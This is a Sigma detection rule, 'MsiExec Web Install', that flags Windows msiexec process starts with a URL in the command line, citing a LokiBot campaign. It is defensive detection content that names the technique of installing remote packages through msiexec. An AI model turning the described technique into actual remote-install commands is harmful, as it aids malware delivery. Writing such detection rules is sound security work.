MsiExec Web Install
Detects suspicious msiexec process starts with web addresses as parameter
Sigma rule (View on GitHub)
1title: MsiExec Web Install
2id: f7b5f842-a6af-4da5-9e95-e32478f3cd2f
3related:
4 - id: 8150732a-0c9d-4a99-82b9-9efb9b90c40c
5 type: similar
6status: test
7description: Detects suspicious msiexec process starts with web addresses as parameter
8references:
9 - https://blog.trendmicro.com/trendlabs-security-intelligence/attack-using-windows-installer-msiexec-exe-leads-lokibot/
10author: Florian Roth (Nextron Systems)
11date: 2018/02/09
12modified: 2022/01/07
13tags:
14 - attack.defense_evasion
15 - attack.t1218.007
16 - attack.command_and_control
17 - attack.t1105
18logsource:
19 category: process_creation
20 product: windows
21detection:
22 selection:
23 CommandLine|contains|all:
24 - ' msiexec'
25 - '://'
26 condition: selection
27falsepositives:
28 - False positives depend on scripts and administrative tools used in the monitored environment
29level: medium
References
Related rules
- Suspicious Registry Key Added: LanmanServer Parameters
- Suspicious Registry Key Set (MaxMpxCt)
- Suspicious Registry Modification of MaxMpxCt Parameters
- PowerShell DownloadFile
- RDP Port Forwarding Rule Added Via Netsh.EXE